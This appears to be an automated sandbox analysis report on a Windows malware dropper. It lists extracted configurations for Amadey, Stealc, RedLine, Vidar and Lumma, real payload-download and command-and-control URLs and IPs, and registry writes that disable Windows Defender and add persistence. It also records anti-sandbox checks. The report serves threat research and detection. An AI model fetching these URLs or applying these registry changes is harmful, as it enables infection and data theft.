Resubmissions
20-02-2025 13:52
250220-q6q6nswkht 10Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
20-02-2025 13:52
Static task
static1
Behavioral task
behavioral1
Sample
b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe
Resource
win10v2004-20250217-en
General
-
Target
b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe
-
Size
5.5MB
-
MD5
964ba389f37bb877cc31a8c8ff6918bc
-
SHA1
783a05c3876487d7b1e3785bc730f976b0a86cab
-
SHA256
b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13
-
SHA512
bd2e09cc34bcc96dd81822b82bf4fb4973db6348b4f9929123e26102716543176f8d88870716d55c449988ac00958f85eaaf524572e949cbfc302248a459c4c5
-
SSDEEP
98304:7ZtVcygxD+UeVpiMjSTG/vJYivqEGzHrNxaTN00X/6KWouxIFtcFGR7AbwEtt:rS/+xpHSy/BYDEGbrNxaTNNKxIuGRqt
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
lumma
https://penetratebatt.pw/api
Signatures
-
Amadey family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/7160-3701-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/7160-3703-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/7160-3704-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1628-325-0x0000000000400000-0x0000000000872000-memory.dmp healer behavioral1/memory/1628-326-0x0000000000400000-0x0000000000872000-memory.dmp healer behavioral1/memory/1628-420-0x0000000000400000-0x0000000000872000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/5640-1382-0x0000000000380000-0x00000000007F8000-memory.dmp family_sectoprat behavioral1/memory/5640-1381-0x0000000000380000-0x00000000007F8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 20 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1Q39x7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2p7464.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5afb3f6749.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3l82Y.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 791fd74b89.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bf14320d81.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c52951429a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fe90177534.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 02a5726205.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2ee2d4784c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e8172d6c5e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 53 412 powershell.exe 68 2808 powershell.exe 125 892 powershell.exe -
pid Process 4576 powershell.exe 1564 powershell.exe 2260 powershell.exe 412 powershell.exe 2808 powershell.exe 892 powershell.exe -
Downloads MZ/PE file 29 IoCs
flow pid Process 36 3940 skotes.exe 36 3940 skotes.exe 36 3940 skotes.exe 36 3940 skotes.exe 36 3940 skotes.exe 228 5440 BitLockerToGo.exe 280 5292 futors.exe 280 5292 futors.exe 280 5292 futors.exe 53 412 powershell.exe 68 2808 powershell.exe 317 5292 futors.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 31 3940 skotes.exe 238 6892 BitLockerToGo.exe 125 892 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=acf14c89-4870-4eb7-b512-1ca2e47936cd&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAdNc1f3CvCkKagIbJ43rU7AAAAAACAAAAAAAQZgAAAAEAACAAAACul5nV6Knhntqpr179tQJhrdw6RBzj2hyCVWx1p6oD5QAAAAAOgAAAAAIAACAAAABjdKV5oKM%2bzZB20xJ5b1u8wqRZNltGxx16RPE3VqSjrqAEAACik53kBlQCh4Gpjs%2biueXAtw1IJyrgn6W9MhE6BU0Pa1f%2bShSQBbY81O8%2bEZcwV31KCPTPz%2fk2Xne0EskPl%2fRAZ%2bzum8502xXgdieV2T0SYZ0wWr2lJ7W23lP4koemkZS4chQiNUo%2f4rJsWuTs9MDzCyOYN4fk9%2bwmr0TGgHCnjwsHBdpF1JtNs1kNmxuAks2ZpwCXhaF7IuE5mZqQvoUOTJmqLz1KNsiS59yJ5sc%2f%2bVnuNfdyZTjSLmQAx%2fiOd8LxzPVrr6fG1N4R8NwCHtQxWupklNVqR4VOhsg7K3iCk7uNHPJOIcEGf8STUxHtyDufcRUK0Cq9uNGgFkcBwVxLmncjdnnTYK%2fQkRSHQ2FP6wwQJ0I%2fGMJKKdBxYl9FATQm5fPZTRvyXDmOIZYgC937BWxRtO5VtYW%2f3WQ1WlUNi0G4hMM7Uvhxty4qvUD5o5dCQJ6bbTBAmLHPHPFwamec5IKuCaDjV6mGGzusZXdaJm%2bFZYRsn4eswk3OmSpSHtuUJfM0eVO3a2%2fs%2b8e4QZaydSI5HHp7ix0HTku2FD0X3oWl8%2bx5K3UXxAqzugftCyZ%2bV3ZVxKtH55H0VM1qK5n909gu4H18jYIfVYkuEupHGIfE%2f96IF33Ufj5DhGhQOhQOLymd51A6blTHfSPpPlJAxHHS89tGXVVhNnZmiNbQBDVctZUj5ul8%2bt89WkfDS3DCoQtMUYecAOpSxLI34M%2fn0IJAtVDgGR0twT5gfHlvzgeuDs%2b7h5yMPesin7TkctMm74BIuTQX56cMAt6hswFjosy19NsSLmLj%2bRpITn1QHXUPY5fQhH0gC92CjXpIkUtXg7Jcf%2fzar2BPK%2bOfM32xIUJ1KyEJ0sf6d7iae0I5a39Mj6dZ66EGpwPHDfLZWMuBd5UIRWfgKI9fv3lO1rJ%2bd7iPsJVQdGpBGDNKnflqvU7UnR5yHz8u8V1TPtTX3Ggno%2fw340%2brKCBmQstgT%2bUD%2fes8ji48Q4rDDTfUr%2fKdABI%2bZz0uYvT1BqoqvuJNGE40O3Uuo3EMa%2fUgtjvIum6xCoiY9rn3ciMc2ILg9D4ZAbvEhZYkwkcKuCh3fdLmw16gj4tHZXXur2pSndZVz%2ffTfgASOxHEl7ivjK%2fUSC0c7Uq4n1L4YrsBT9APWK1wO3Bgs8ihCgnQRtSxYWkI0pDJu3d%2bolmglSbDLywvUjCPiBy8fWZYXhEfh52t4X3u6dt7eOdrMt1isEvAJxfpmnuFc9NOGKwy%2bxFA%2b1rFlhA6v8LmzGiI5Uq6YHomOhidZ7wkkrD42uh8XCSso2hZDzliWS%2fiKMLPSMhqx7e%2frEvXJhXram%2b%2fNTYtktam1B7qyT4EacgH%2fHDdHa1Wnn7HXAn9K3mFeSTWED%2fnpK1J2bif1mMLPq8B9eA3IDePmR%2fzhtMJYQva6fGh9f1eC6A0e6RrWWOHo7TP7OGgGSQGipsavAn3Ya1LfZdzdRI%2bE3ZBEm3gMcqDccJnY1GCpJ%2bTB72%2fDVOnBH117%2b0%2fsUo%2bw3VHhcSSqNYDYSdZyByedoiPtIj%2byn4seYDsLHU7LQk0V%2f7fxxglorZbGP7JPHIlDMwnXkAAAABNh2%2btl%2f60uDiLoGV2ZOMCFH1VOA6WdgtLTAer2muHupN2WHdwgstVxQY7AUfukq%2fdmBojjSjPJuPe3Zu4a0kF&c=prequest&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 40 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 791fd74b89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2ee2d4784c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2ee2d4784c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bf14320d81.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1Q39x7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3l82Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5afb3f6749.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 791fd74b89.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3l82Y.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fe90177534.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c52951429a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c52951429a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bf14320d81.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 02a5726205.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2p7464.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5afb3f6749.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2p7464.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e8172d6c5e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1Q39x7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fe90177534.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e8172d6c5e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 02a5726205.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation a1EoH8b.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation 1Q39x7.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation a1EoH8b.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation sQ3DZPU.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 58 IoCs
pid Process 3040 i2V63.exe 3744 1Q39x7.exe 3940 skotes.exe 4996 2p7464.exe 3996 3l82Y.exe 1396 sQ3DZPU.exe 2332 a1EoH8b.exe 4896 skotes.exe 348 MAl7pjE.exe 3772 647e3a57ba.exe 1020 ScreenConnect.ClientService.exe 3156 ScreenConnect.WindowsClient.exe 2640 ScreenConnect.WindowsClient.exe 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 1728 apisysDirectx.exe 4976 5afb3f6749.exe 3728 483d2fa8a0d53818306efeb32d3.exe 728 fe90177534.exe 1576 5eb81d9b73.exe 1232 791fd74b89.exe 5088 55c38d1b84.exe 3296 32d10d4cf6.exe 4104 1a1d30316b.exe 6284 TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE 6456 skotes.exe 6448 apisysDirectx.exe 6732 bf14320d81.exe 7000 2ee2d4784c.exe 5640 e8172d6c5e.exe 6600 c52951429a.exe 6252 amnew.exe 5292 futors.exe 6136 02a5726205.exe 2400 DTQCxXZ.exe 7156 7aencsM.exe 5572 7aencsM.exe 7160 7aencsM.exe 6528 trano1221.exe 6248 trano1221.exe 5592 skotes.exe 6772 apisysDirectx.exe 1564 futors.exe 6684 con12312211221.exe 6748 con12312211221.exe 7148 dzvh4HC.exe 6556 Bjkm5hE.exe 2400 Bjkm5hE.exe 3724 monthdragon.exe 5476 monthdragon.exe 6812 a1EoH8b.exe 4512 12321321.exe 1692 f3Ypd8O.exe 6700 f3Ypd8O.exe 6680 f3Ypd8O.exe 1580 MAl7pjE.exe 1164 alex12112.exe 1512 alex12112.exe 2776 alex12112.exe -
Identifies Wine through registry keys 2 TTPs 20 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine bf14320d81.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 1Q39x7.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 5afb3f6749.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 791fd74b89.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 2ee2d4784c.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine e8172d6c5e.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine c52951429a.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 2p7464.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 3l82Y.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine fe90177534.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine 02a5726205.exe Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine skotes.exe -
Loads dropped DLL 64 IoCs
pid Process 3696 MsiExec.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 976 rundll32.exe 324 MsiExec.exe 4772 MsiExec.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 6248 trano1221.exe 4608 MsiExec.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 6148 rundll32.exe 4468 MsiExec.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\647e3a57ba.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089179101\\647e3a57ba.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089180021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fe90177534.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089265001\\fe90177534.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\791fd74b89.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089267001\\791fd74b89.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32d10d4cf6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089269001\\32d10d4cf6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1a1d30316b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089270001\\1a1d30316b.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" i2V63.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: 